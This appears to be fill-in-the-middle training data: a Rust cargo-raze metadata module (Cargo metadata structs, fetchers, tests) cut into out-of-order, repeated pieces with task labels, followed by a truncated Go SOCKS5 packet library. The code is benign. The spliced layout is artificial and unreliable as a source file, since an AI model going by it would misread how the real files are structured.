pub features: HashMap<String, Vec<String>>,
pub manifest_path: String,
pub edition: String,
pub sha256: Option<String>,
}
/**
* The metadata for a dependency (a reference connecting a crate to another crate).
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`SerializedDependency`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/core/dependency.rs#L49-L60)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Dependency {
pub name: String,
pub source: String,
pub req: String,
pub kind: Option<Kind>,
#[serde(default = "default_dependency_field_optional")]
pub optional: bool,
#[serde(default = "default_dependency_field_uses_default_features")]
pub uses_default_features: bool,
pub features: Vec<String>,
pub target: Option<TargetSpec>,
}
/**
* The metadata for a compileable target.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`SerializedTarget`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/core/manifest.rs#L188-L197)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Target {
pub name: String,
pub kind: Vec<String>,
pub crate_types: Vec<String>,
pub src_path: String,
pub edition: String,
}
/**
* The metadata for a fully resolved dependency tree.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`MetadataResolve`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/ops/cargo_output_metadata.rs#L91-L95)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Resolve {
pub nodes: Vec<ResolveNode>,
pub root: PackageId,
}
/**
* The metadata for a single resolved entry in the full dependency tree.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`Node`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/ops/cargo_output_metadata.rs#L102-L106)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct ResolveNode {
pub id: PackageId,
pub dependencies: Vec<PackageId>,
// Optional due to recent feature addition in Cargo.
pub features: Option<Vec<String>>,
}
/** A workspace metadata fetcher that uses the Cargo Metadata subcommand. */
#[allow(dead_code)]
pub struct CargoSubcommandMetadataFetcher;
/**
* A workspace metadata fetcher that uses Cargo's internals.
*
* !DANGER DANGER!
* This struct is very hard to test as it uses Cargo's stateful internals, please take care when
* changing it.
* !DANGER DANGER!
*/
pub struct CargoInternalsMetadataFetcher<'config> {
cargo_config: &'config Config,
}
impl MetadataFetcher for CargoSubcommandMetadataFetcher {
fn fetch_metadata(&mut self, files: CargoWorkspaceFiles) -> CargoResult<Metadata> {
assert!(files.toml_path.is_file());
assert!(files.lock_path_opt.as_ref().map_or(true, |p| p.is_file()));
// Copy files into a temp directory
// UNWRAP: Guarded by function assertion
let cargo_tempdir = {
let dir = TempDir::new("cargo_raze_metadata_dir")?;
let dir_path = dir.path();
let new_toml_path = dir_path.join(files.toml_path.file_name().unwrap());
fs::copy(files.toml_path, new_toml_path)?;
if let Some(lock_path) = files.lock_path_opt {
let new_lock_path = dir_path.join(lock_path.file_name().unwrap());
fs::copy(lock_path, new_lock_path)?;
}
dir
};
// Shell out to cargo
let exec_output = Command::new("cargo")
.current_dir(cargo_tempdir.path())
.args(&["metadata", "--format-version", "1"])
.output()?;
// Handle command errs
let stdout_str =
String::from_utf8(exec_output.stdout).unwrap_or_else(|_| "[unparsable bytes]".to_owned());
if !exec_output.status.success() {
let stderr_str =
String::from_utf8(exec_output.stderr).unwrap_or_else(|_| "[unparsable bytes]".to_owned());
println!("`cargo metadata` failed. Inspect Cargo.toml for issues!");
println!("stdout: {}", stdout_str);
println!("stderr: {}", stderr_str);
return Err(RazeError::Generic("Failed to run `cargo metadata`".to_owned()).into());
}
// Parse and yield metadata
serde_json::from_str::<Metadata>(&stdout_str).map_err(|e| e.into())
}
}
impl<'config> MetadataFetcher for CargoInternalsMetadataFetcher<'config> {
fn fetch_metadata(&mut self, files: CargoWorkspaceFiles) -> CargoResult<Metadata> {
let manifest = if files.toml_path.is_relative() {
env::current_dir().unwrap().join(&files.toml_path)
} else {
files.toml_path
};
let ws = Workspace::new(&manifest, &self.cargo_config)?;
let specs = Packages::All.to_package_id_specs(&ws)?;
let root_name = specs.iter().next().unwrap().name();
let resolve_opts = ResolveOpts::new(true, &[], false, false);
let (resolved_packages, cargo_resolve) = ops::resolve_ws_with_opts(&ws, resolve_opts, &specs)?;
let root = cargo_resolve
.iter()
.find(|dep| dep.name() == root_name)
.ok_or_else(|| RazeError::Internal("root crate should be in cargo resolve".to_owned()))?
.to_string();
let nodes = cargo_resolve
.iter()
.map(|id| ResolveNode {
id: id.to_string(),
features: Some(
cargo_resolve
.features_sorted(id)
.iter()
.map(|s| s.to_string())
.collect(),
),
dependencies: cargo_resolve.deps(id).map(|(p, _)| p.to_string()).collect(),
})
.collect();
let resolve = Resolve { nodes, root };
let packages = resolved_packages
.package_ids()
// TODO(acmcarther): Justify this unwrap
.map(|package_id| (package_id, resolved_packages.get_one(package_id).unwrap()))
.map(|(package_id, package)| {
let manifest_metadata = package.manifest().metadata();
let dependencies = package
.dependencies()
.iter()
.map(|dependency| Dependency {
name: dependency.package_name().to_string(),
// UNWRAP: It's cargo's responsibility to ensure a serializable source_id
source: serde_json::to_string(&dependency.source_id()).unwrap(),
req: dependency.version_req().to_string(),
kind: match dependency.kind() {
CargoKind::Normal => None,
CargoKind::Development => Some("dev".to_owned()),
CargoKind::Build => Some("build".to_owned()),
},
optional: dependency.is_optional(),
uses_default_features: dependency.uses_default_features(),
features: dependency
.features()
.iter()
.map(|s| s.to_string())
.collect(),
target: dependency.platform().map(|p| p.to_string()),
})
.collect();
let targets = package
.targets()
.iter()
.map(|target| Target {
name: target.name().to_owned(),
kind: util::kind_to_kinds(target.kind()),
src_path: target.src_path().path().unwrap().display().to_string(),
edition: target.edition().to_string(),
crate_types: target
.rustc_crate_types()
.iter()
.map(|t| t.to_string())
.collect(),
})
.collect();
let features = package
.summary()
.features()
.iter()
.map(|(feature, feature_values)| {
let our_feature_values = feature_values
.iter()
.map(|value| match value {
CargoFeatureValue::Feature(name) | CargoFeatureValue::Crate(name) => {
name.to_string()
}
// This matches the current Serialize impl for CargoFeatureValue
CargoFeatureValue::CrateFeature(crate_name, feature_name) => {
format!("{}/{}", crate_name.as_str(), feature_name.as_str())
}
})
.collect();
(feature.to_string(), our_feature_values)
})
.collect();
// UNWRAP: It's cargo's responsibility to ensure a serializable source_id
let pkg_source = serde_json::to_string(&package_id.source_id()).unwrap();
// Cargo use SHA256 for checksum so we can use them directly
let sha256 = package
.manifest()
.summary()
.checksum()
.map(ToString::to_string);
Package {
name: package.name().to_string(),
version: package.version().to_string(),
id: package_id.to_string(),
license: manifest_metadata.license.clone(),
license_file: manifest_metadata.license_file.clone(),
description: manifest_metadata.description.clone(),
source: Some(pkg_source),
manifest_path: package.manifest_path().display().to_string(),
edition: package.manifest().edition().to_string(),
dependencies,
targets,
features,
sha256,
}
})
.collect();
let workspace_members = ws
.members()
.map(|pkg| pkg.package_id().to_string())
.collect();
Ok(Metadata {
target_directory: ws.target_dir().display().to_string(),
version: 0, /* not generated via subcomand */
packages,
resolve,
workspace_members,
})
}
}
impl<'config> CargoInternalsMetadataFetcher<'config> {
pub fn new(cargo_config: &'config Config) -> CargoInternalsMetadataFetcher<'config> {
CargoInternalsMetadataFetcher { cargo_config }
}
}
fn default_dependency_field_optional() -> bool {
// Dependencies are implicitly required.
// TODO(acmcarther): Citation?
false
}
fn default_dependency_field_uses_default_features() -> bool {
// Default features are used by default
// Citation: https://doc.rust-lang.org/cargo/reference/manifest.html#rules
true
}
#[cfg(test)]
pub mod testing {
use super::*;
pub struct StubMetadataFetcher {
metadata: Metadata,
}
impl MetadataFetcher for StubMetadataFetcher {
fn fetch_metadata(&mut self, _: CargoWorkspaceFiles) -> CargoResult<Metadata> {
Ok(self.metadata.clone())
}
}
impl StubMetadataFetcher {
pub fn with_metadata(metadata: Metadata) -> StubMetadataFetcher {
StubMetadataFetcher { metadata }
}
}
pub fn dummy_package() -> Package {
Package {
name: String::new(),
version: String::new(),
id: String::new(),
license: None,
license_file: None,
description: None,
source: None,
dependencies: Vec::new(),
targets: Vec::new(),
features: HashMap::new(),
manifest_path: String::new(),
edition: String::new(),
sha256: None,
}
}
pub fn dummy_metadata() -> Metadata {
Metadata {
packages: Vec::new(),
resolve: dummy_resolve(),
workspace_members: Vec::new(),
target_directory: String::new(),
version: 1,
}
}
pub fn dummy_resolve() -> Resolve {
Resolve {
nodes: Vec::new(),
root: String::new(),
}
}
}
#[cfg(test)]
mod tests {
use super::*;
use serde_json;
use std::fs::File;
use std::io::Write;
fn basic_toml() -> &'static str {
"
[package]
name = \"test\"
version = \"0.0.1\"
[lib]
path = \"not_a_file.rs\"
"
}
fn basic_lock() -> &'static str {
"
[[package]]
name = \"test\"
version = \"0.0.1\"
dependencies = [
]
"
}
#[test]
fn test_metadata_deserializes_correctly() {
let metadata_file_contents = include_str!("../test_fixtures/metadata.txt");
serde_json::from_str::<Metadata>(metadata_file_contents).unwrap();
}
#[test]
fn test_cargo_subcommand_metadata_fetcher_works_without_lock() {
let dir = TempDir::new("test_cargo_raze_metadata_dir").unwrap();
let toml_path = dir.path().join("Cargo.toml");
let mut toml = File::create(&toml_path).unwrap();
toml.write_all(basic_toml().as_bytes()).unwrap();
let files = CargoWorkspaceFiles {
lock_path_opt: None,
toml_path,
};
let mut fetcher = CargoSubcommandMetadataFetcher;
fetcher.fetch_metadata(files).unwrap();
}
#[test]
fn test_cargo_subcommand_metadata_fetcher_works_with_lock() {
let dir = TempDir::new("test_cargo_raze_metadata_dir").unwrap();
let toml_path = {
let path = dir.path().join("Cargo.toml");
let mut toml = File::create(&path).unwrap();
toml.write_all(basic_toml().as_bytes()).unwrap();
path
};
let lock_path = {
let path = dir.path().join("Cargo.lock");
let mut lock = File::create(&path).unwrap();
lock.write_all(basic_lock().as_bytes()).unwrap();
path
};
let files = CargoWorkspaceFiles {
lock_path_opt: Some(lock_path),
toml_path,
};
let mut fetcher = CargoSubcommandMetadataFetcher;
fetcher.fetch_metadata(files).unwrap();
}
#[test]
fn test_cargo_subcommand_metadata_fetcher_handles_bad_files() |
}
| {
let dir = TempDir::new("test_cargo_raze_metadata_dir").unwrap();
let toml_path = {
let path = dir.path().join("Cargo.toml");
let mut toml = File::create(&path).unwrap();
toml.write_all(b"hello").unwrap();
path
};
let files = CargoWorkspaceFiles {
lock_path_opt: None,
toml_path,
};
let mut fetcher = CargoSubcommandMetadataFetcher;
assert!(fetcher.fetch_metadata(files).is_err());
} | identifier_body |
metadata.rs | // Copyright 2018 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use cargo::{
core::{
dependency::Kind as CargoKind, resolver::ResolveOpts,
summary::FeatureValue as CargoFeatureValue, Workspace,
},
ops::{self, Packages},
util::Config,
CargoResult,
};
use serde_json;
use std::{collections::HashMap, env, fs, path::PathBuf, process::Command};
use crate::util::{self, RazeError};
use tempdir::TempDir;
use serde_derive::{Deserialize, Serialize};
pub type PackageId = String;
pub type Kind = String;
pub type TargetSpec = String;
/**
* An entity that can retrive deserialized metadata for a Cargo Workspace.
*
* The `CargoInternalsMetadataFetcher` is probably the one you want.
*
* Usage of ..Subcommand.. is waiting on a cargo release containing
* <https://github.com/rust-lang/cargo/pull/5122>
*/
pub trait MetadataFetcher {
fn fetch_metadata(&mut self, files: CargoWorkspaceFiles) -> CargoResult<Metadata>;
}
/** The local Cargo workspace files to be used for build planning .*/
pub struct CargoWorkspaceFiles {
pub toml_path: PathBuf,
pub lock_path_opt: Option<PathBuf>,
}
/**
* The metadata for a whole Cargo workspace.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`ExportInfo`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/ops/cargo_output_metadata.rs#L78-L85)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Metadata {
pub packages: Vec<Package>,
pub resolve: Resolve,
pub workspace_members: Vec<PackageId>,
pub target_directory: String,
pub version: i64,
}
/**
* The metadata for an individual Cargo crate.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`SerializedPackage`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/core/package.rs#L32-L50)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Package {
pub name: String,
pub version: String,
pub id: PackageId,
pub license: Option<String>,
pub license_file: Option<String>,
pub description: Option<String>,
pub source: Option<String>,
pub dependencies: Vec<Dependency>,
pub targets: Vec<Target>,
pub features: HashMap<String, Vec<String>>,
pub manifest_path: String,
pub edition: String,
pub sha256: Option<String>,
}
/**
* The metadata for a dependency (a reference connecting a crate to another crate).
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`SerializedDependency`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/core/dependency.rs#L49-L60)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Dependency {
pub name: String,
pub source: String,
pub req: String,
pub kind: Option<Kind>,
#[serde(default = "default_dependency_field_optional")]
pub optional: bool,
#[serde(default = "default_dependency_field_uses_default_features")]
pub uses_default_features: bool,
pub features: Vec<String>,
pub target: Option<TargetSpec>,
}
/**
* The metadata for a compileable target.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`SerializedTarget`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/core/manifest.rs#L188-L197)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Target {
pub name: String,
pub kind: Vec<String>,
pub crate_types: Vec<String>,
pub src_path: String,
pub edition: String,
}
/**
* The metadata for a fully resolved dependency tree.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`MetadataResolve`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/ops/cargo_output_metadata.rs#L91-L95)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Resolve {
pub nodes: Vec<ResolveNode>,
pub root: PackageId,
}
/**
* The metadata for a single resolved entry in the full dependency tree.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`Node`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/ops/cargo_output_metadata.rs#L102-L106)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct ResolveNode {
pub id: PackageId,
pub dependencies: Vec<PackageId>,
// Optional due to recent feature addition in Cargo.
pub features: Option<Vec<String>>,
}
/** A workspace metadata fetcher that uses the Cargo Metadata subcommand. */
#[allow(dead_code)]
pub struct CargoSubcommandMetadataFetcher;
/**
* A workspace metadata fetcher that uses Cargo's internals.
*
* !DANGER DANGER!
* This struct is very hard to test as it uses Cargo's stateful internals, please take care when
* changing it.
* !DANGER DANGER!
*/
pub struct CargoInternalsMetadataFetcher<'config> {
cargo_config: &'config Config,
}
impl MetadataFetcher for CargoSubcommandMetadataFetcher {
fn fetch_metadata(&mut self, files: CargoWorkspaceFiles) -> CargoResult<Metadata> {
assert!(files.toml_path.is_file());
assert!(files.lock_path_opt.as_ref().map_or(true, |p| p.is_file()));
// Copy files into a temp directory
// UNWRAP: Guarded by function assertion
let cargo_tempdir = {
let dir = TempDir::new("cargo_raze_metadata_dir")?;
let dir_path = dir.path();
let new_toml_path = dir_path.join(files.toml_path.file_name().unwrap());
fs::copy(files.toml_path, new_toml_path)?;
if let Some(lock_path) = files.lock_path_opt {
let new_lock_path = dir_path.join(lock_path.file_name().unwrap());
fs::copy(lock_path, new_lock_path)?;
}
dir
};
// Shell out to cargo
let exec_output = Command::new("cargo")
.current_dir(cargo_tempdir.path())
.args(&["metadata", "--format-version", "1"])
.output()?;
// Handle command errs
let stdout_str =
String::from_utf8(exec_output.stdout).unwrap_or_else(|_| "[unparsable bytes]".to_owned());
if !exec_output.status.success() {
let stderr_str =
String::from_utf8(exec_output.stderr).unwrap_or_else(|_| "[unparsable bytes]".to_owned());
println!("`cargo metadata` failed. Inspect Cargo.toml for issues!");
println!("stdout: {}", stdout_str);
println!("stderr: {}", stderr_str);
return Err(RazeError::Generic("Failed to run `cargo metadata`".to_owned()).into());
}
// Parse and yield metadata
serde_json::from_str::<Metadata>(&stdout_str).map_err(|e| e.into())
}
}
impl<'config> MetadataFetcher for CargoInternalsMetadataFetcher<'config> {
fn fetch_metadata(&mut self, files: CargoWorkspaceFiles) -> CargoResult<Metadata> {
let manifest = if files.toml_path.is_relative() {
env::current_dir().unwrap().join(&files.toml_path)
} else {
files.toml_path
};
let ws = Workspace::new(&manifest, &self.cargo_config)?;
let specs = Packages::All.to_package_id_specs(&ws)?;
let root_name = specs.iter().next().unwrap().name();
let resolve_opts = ResolveOpts::new(true, &[], false, false);
let (resolved_packages, cargo_resolve) = ops::resolve_ws_with_opts(&ws, resolve_opts, &specs)?;
let root = cargo_resolve
.iter()
.find(|dep| dep.name() == root_name)
.ok_or_else(|| RazeError::Internal("root crate should be in cargo resolve".to_owned()))?
.to_string();
let nodes = cargo_resolve
.iter()
.map(|id| ResolveNode {
id: id.to_string(),
features: Some(
cargo_resolve
.features_sorted(id)
.iter()
.map(|s| s.to_string())
.collect(),
),
dependencies: cargo_resolve.deps(id).map(|(p, _)| p.to_string()).collect(),
})
.collect();
let resolve = Resolve { nodes, root };
let packages = resolved_packages
.package_ids()
// TODO(acmcarther): Justify this unwrap
.map(|package_id| (package_id, resolved_packages.get_one(package_id).unwrap()))
.map(|(package_id, package)| {
let manifest_metadata = package.manifest().metadata();
let dependencies = package
.dependencies()
.iter()
.map(|dependency| Dependency {
name: dependency.package_name().to_string(),
// UNWRAP: It's cargo's responsibility to ensure a serializable source_id
source: serde_json::to_string(&dependency.source_id()).unwrap(),
req: dependency.version_req().to_string(),
kind: match dependency.kind() {
CargoKind::Normal => None,
CargoKind::Development => Some("dev".to_owned()),
CargoKind::Build => Some("build".to_owned()),
},
optional: dependency.is_optional(),
uses_default_features: dependency.uses_default_features(),
features: dependency
.features()
.iter()
.map(|s| s.to_string())
.collect(),
target: dependency.platform().map(|p| p.to_string()),
})
.collect();
let targets = package
.targets()
.iter()
.map(|target| Target {
name: target.name().to_owned(),
kind: util::kind_to_kinds(target.kind()),
src_path: target.src_path().path().unwrap().display().to_string(),
edition: target.edition().to_string(),
crate_types: target
.rustc_crate_types()
.iter()
.map(|t| t.to_string())
.collect(),
})
.collect();
let features = package
.summary()
.features()
.iter()
.map(|(feature, feature_values)| {
let our_feature_values = feature_values
.iter()
.map(|value| match value {
CargoFeatureValue::Feature(name) | CargoFeatureValue::Crate(name) => {
name.to_string()
}
// This matches the current Serialize impl for CargoFeatureValue
CargoFeatureValue::CrateFeature(crate_name, feature_name) => {
format!("{}/{}", crate_name.as_str(), feature_name.as_str())
}
})
.collect();
(feature.to_string(), our_feature_values)
})
.collect();
// UNWRAP: It's cargo's responsibility to ensure a serializable source_id
let pkg_source = serde_json::to_string(&package_id.source_id()).unwrap();
// Cargo use SHA256 for checksum so we can use them directly
let sha256 = package
.manifest()
.summary()
.checksum()
.map(ToString::to_string);
Package {
name: package.name().to_string(),
version: package.version().to_string(),
id: package_id.to_string(),
license: manifest_metadata.license.clone(),
license_file: manifest_metadata.license_file.clone(),
description: manifest_metadata.description.clone(),
source: Some(pkg_source),
manifest_path: package.manifest_path().display().to_string(),
edition: package.manifest().edition().to_string(),
dependencies,
targets,
features,
sha256,
}
})
.collect();
let workspace_members = ws
.members()
.map(|pkg| pkg.package_id().to_string())
.collect();
Ok(Metadata {
target_directory: ws.target_dir().display().to_string(),
version: 0, /* not generated via subcomand */
packages,
resolve,
workspace_members,
})
}
}
impl<'config> CargoInternalsMetadataFetcher<'config> {
pub fn new(cargo_config: &'config Config) -> CargoInternalsMetadataFetcher<'config> {
CargoInternalsMetadataFetcher { cargo_config }
}
}
fn default_dependency_field_optional() -> bool {
// Dependencies are implicitly required.
// TODO(acmcarther): Citation?
false
}
fn default_dependency_field_uses_default_features() -> bool {
// Default features are used by default
// Citation: https://doc.rust-lang.org/cargo/reference/manifest.html#rules
true
}
#[cfg(test)]
pub mod testing {
use super::*;
pub struct StubMetadataFetcher {
metadata: Metadata,
}
impl MetadataFetcher for StubMetadataFetcher {
fn fetch_metadata(&mut self, _: CargoWorkspaceFiles) -> CargoResult<Metadata> {
Ok(self.metadata.clone())
}
}
impl StubMetadataFetcher {
pub fn with_metadata(metadata: Metadata) -> StubMetadataFetcher {
StubMetadataFetcher { metadata }
}
}
pub fn dummy_package() -> Package {
Package {
name: String::new(),
version: String::new(),
id: String::new(),
license: None,
license_file: None,
description: None,
source: None,
dependencies: Vec::new(),
targets: Vec::new(),
features: HashMap::new(),
manifest_path: String::new(),
edition: String::new(),
sha256: None,
}
}
pub fn dummy_metadata() -> Metadata {
Metadata {
packages: Vec::new(),
resolve: dummy_resolve(),
workspace_members: Vec::new(),
target_directory: String::new(),
version: 1,
}
}
pub fn dummy_resolve() -> Resolve {
Resolve {
nodes: Vec::new(),
root: String::new(),
}
}
}
#[cfg(test)]
mod tests {
use super::*;
use serde_json;
use std::fs::File;
use std::io::Write;
fn basic_toml() -> &'static str {
"
[package]
name = \"test\"
version = \"0.0.1\"
[lib]
path = \"not_a_file.rs\"
"
}
fn basic_lock() -> &'static str {
"
[[package]]
name = \"test\"
version = \"0.0.1\"
dependencies = [
]
"
}
#[test]
fn test_metadata_deserializes_correctly() {
let metadata_file_contents = include_str!("../test_fixtures/metadata.txt");
serde_json::from_str::<Metadata>(metadata_file_contents).unwrap();
}
#[test]
fn test_cargo_subcommand_metadata_fetcher_works_without_lock() {
let dir = TempDir::new("test_cargo_raze_metadata_dir").unwrap();
let toml_path = dir.path().join("Cargo.toml");
let mut toml = File::create(&toml_path).unwrap();
toml.write_all(basic_toml().as_bytes()).unwrap();
let files = CargoWorkspaceFiles {
lock_path_opt: None,
toml_path,
};
let mut fetcher = CargoSubcommandMetadataFetcher;
fetcher.fetch_metadata(files).unwrap();
}
#[test]
fn | () {
let dir = TempDir::new("test_cargo_raze_metadata_dir").unwrap();
let toml_path = {
let path = dir.path().join("Cargo.toml");
let mut toml = File::create(&path).unwrap();
toml.write_all(basic_toml().as_bytes()).unwrap();
path
};
let lock_path = {
let path = dir.path().join("Cargo.lock");
let mut lock = File::create(&path).unwrap();
lock.write_all(basic_lock().as_bytes()).unwrap();
path
};
let files = CargoWorkspaceFiles {
lock_path_opt: Some(lock_path),
toml_path,
};
let mut fetcher = CargoSubcommandMetadataFetcher;
fetcher.fetch_metadata(files).unwrap();
}
#[test]
fn test_cargo_subcommand_metadata_fetcher_handles_bad_files() {
let dir = TempDir::new("test_cargo_raze_metadata_dir").unwrap();
let toml_path = {
let path = dir.path().join("Cargo.toml");
let mut toml = File::create(&path).unwrap();
toml.write_all(b"hello").unwrap();
path
};
let files = CargoWorkspaceFiles {
lock_path_opt: None,
toml_path,
};
let mut fetcher = CargoSubcommandMetadataFetcher;
assert!(fetcher.fetch_metadata(files).is_err());
}
}
| test_cargo_subcommand_metadata_fetcher_works_with_lock | identifier_name |
socks5.go | package socks5
import (
"encoding/binary"
"fmt"
"io"
"net"
"strconv"
"github.com/gamexg/proxylib/mempool"
)
// socks5 版本号
const Socks5Version byte = 0x05
// socks5 鉴定方式
// 无需鉴定 和 用户名密码鉴定
type Socks5AuthMethodType byte
const (
Socks5AuthMethodTypeNone Socks5AuthMethodType = 0x00
Socks5AuthMethodTypePassword Socks5AuthMethodType = 0x02
// 当服务端不支持客户端的鉴定方式时,返回这个类型
// 客户端需要立刻关闭连接
Socks5AuthMethodTypeErr Socks5AuthMethodType = 0xFF
)
// socks5 请求类型 ,socks5 cmd 状态回复
// socks5 请求类型有:tcp 传出连接、 tcp 传入连接 或 udp 连接
// socks5 回复状态有: 成功、一般性失败、规则不允许转发、主机不可达、atyp不支持、cmd命令不支持 等
type Socks5CmdType byte
const (
Socks5CmdTypeConnect Socks5CmdType = 0x01
Socks5CmdTypeBind Socks5CmdType = 0x02
Socks5CmdTypeUdpAssociate Socks5CmdType = 0x3
// cmd 回复,成功
Socks5CmdReplySucceeded Socks5CmdType = 0x00
// cmd 回复,普通SOCKS服务器连接失败
Socks5CmdReplyGeneralSocksServerFailure Socks5CmdType = 0x01
// cmd 回复,规则不允许
Socks5CmdReplyConnectionNotAllowedByRuleset Socks5CmdType = 0x02
// cmd 回复,网络不可达
Socks5CmdReplyNetworkUnreachable Socks5CmdType = 0x03
// cmd 回复,主机不可达
Socks5CmdReplyHostUnreachable Socks5CmdType = 0x04
// cmd 回复,连接被拒绝
Socks5CmdReplyConnectionRefused Socks5CmdType = 0x05
// cmd 回复,ttl超时
Socks5CmdReplyTtlExpired Socks5CmdType = 0x06
// cmd 回复,不支持的命令
Socks5CmdReplyCommandNotSupported Socks5CmdType = 0x07
// cmd 回复,不支持的地址类型
Socks5CmdReplyAddressTypeNotSupported Socks5CmdType = 0x08
// 用户自定义范围 0x09- 0xFF
// 自定义,内部错误
Socks5CmdReplyInternalError Socks5CmdType = 0x010
)
// socks 5 cmd 命令 Atyp 类型
type Socks5AtypType byte
const (
//内部使用,根据 cmd.host、cmd.Ip 内容自动确定 atyp 值
Socks5CmdAtypTypeAuto Socks5AtypType = 0x00
Socks5CmdAtypTypeIP4 Socks5AtypType = 0x01
Socks5CmdAtypTypeDomain Socks5AtypType = 0x03
Socks5CmdAtypTypeIP6 Socks5AtypType = 0x04
)
type Socks5AuthPasswordRStatusType byte
const (
// 用户名、密码正确
Socks5AuthPasswordRStatusTypeSucceeded Socks5AuthPasswordRStatusType = 0x00
// 用户名、密码错误
Socks5AuthPasswordRStatusTypeErr Socks5AuthPasswordRStatusType = 0x01
)
// 鉴定请求
type Socks5AuthPack struct {
Ver byte // 版本5
Methods []Socks5AuthMethodType
}
// 鉴定回应
type Socks5AuthRPack struct {
Ver byte // 版本 5
Method Socks5AuthMethodType
}
// 命令及回应
type Socks5CmdPack struct {
Ver byte // 版本 5
Cmd Socks5CmdType
Rsv byte
Atyp Socks5AtypType
Host []byte
Port uint16
}
// 用户名、密码
type Socks5AuthPasswordPack struct {
Ver byte //目前版本为 1
Username string
Password string
}
type Socks5AuthPasswordRPack struct {
Ver byte //目前版本为 1
Status Socks5AuthPasswordRStatusType // 0 成功 1失败
}
func (auth *Socks5AuthPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
b := buf[:2]
if _, err := io.ReadFull(r, b); err != nil {
return fmt.Errorf("failed to read socks5 auth head, %v", err)
}
auth.Ver = b[0]
nmethods := b[1]
if auth.Ver != 5 {
return fmt.Errorf("ver %v is incorrect", auth.Ver)
}
b = buf[:uint8(nmethods)]
if _, err := io.ReadFull(r, b); err != nil {
return fmt.Errorf("failed to read socks5 auth methods, %v", err)
}
methods := make([]Socks5AuthMethodType, len(b))
for i := range methods {
methods[i] = Socks5AuthMethodType(b[i])
}
auth.Methods = methods
return nil
}
func (auth *Socks5AuthPack) HasMethod(m Socks5AuthMethodType) bool {
for _, v := range auth.Methods {
if v == m {
return true
}
}
return false
}
// 读取鉴定
// 注意,所有这种类型的操作都是阻塞的,需要自己设置超时机制
// 内部会检查协议版本等参数。
func ReadAuth(r io.Reader) (*Socks5AuthPack, error) {
auth := Socks5AuthPack{}
err := auth.Read(r)
if err != nil {
return nil, err
}
return &auth, nil
}
func (auth *Socks5AuthPack) Write(w io.Writer) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = 5
buf[1] = uint8(len(auth.Methods))
for _, v := range auth.Methods {
buf = append(buf, byte(v))
}
| return nil
}
func WriteAuth(w io.Writer, auth *Socks5AuthPack) error {
if auth == nil {
return fmt.Errorf("auth is nil")
}
return auth.Write(w)
}
func ReadSocks5AuthR(r io.Reader) (*Socks5AuthRPack, error) {
ar := Socks5AuthRPack{}
err := ar.Read(r)
if err != nil {
return nil, err
}
return &ar, err
}
func (ar *Socks5AuthRPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return err
}
ar.Ver = buf[0]
ar.Method = Socks5AuthMethodType(buf[1])
if ar.Ver != 5 {
return fmt.Errorf("ver %v is incorrect", buf[0])
}
return nil
}
func WriteSocks5AuthR(w io.Writer, cmd *Socks5AuthRPack) error {
if cmd == nil {
return fmt.Errorf("cmd is nil")
}
return cmd.Write(w)
}
func (cmd *Socks5AuthRPack) Write(w io.Writer) error {
if _, err := w.Write([]byte{cmd.Ver, byte(cmd.Method)}); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
func WriteSocks5Cmd(w io.Writer, cmd *Socks5CmdPack) error {
if cmd == nil {
return fmt.Errorf("cmd is nil")
}
return cmd.Write(w)
}
func (cmd *Socks5CmdPack) Write(w io.Writer) error {
hostSize := len(cmd.Host)
if cmd.Atyp == Socks5CmdAtypTypeDomain && hostSize > 255 {
return fmt.Errorf("domain %v is too long", cmd.Host)
}
buf := mempool.Get(1024)
defer mempool.Put(buf)
port := [2]byte{0}
binary.BigEndian.PutUint16(port[:], cmd.Port)
buf[0] = cmd.Ver
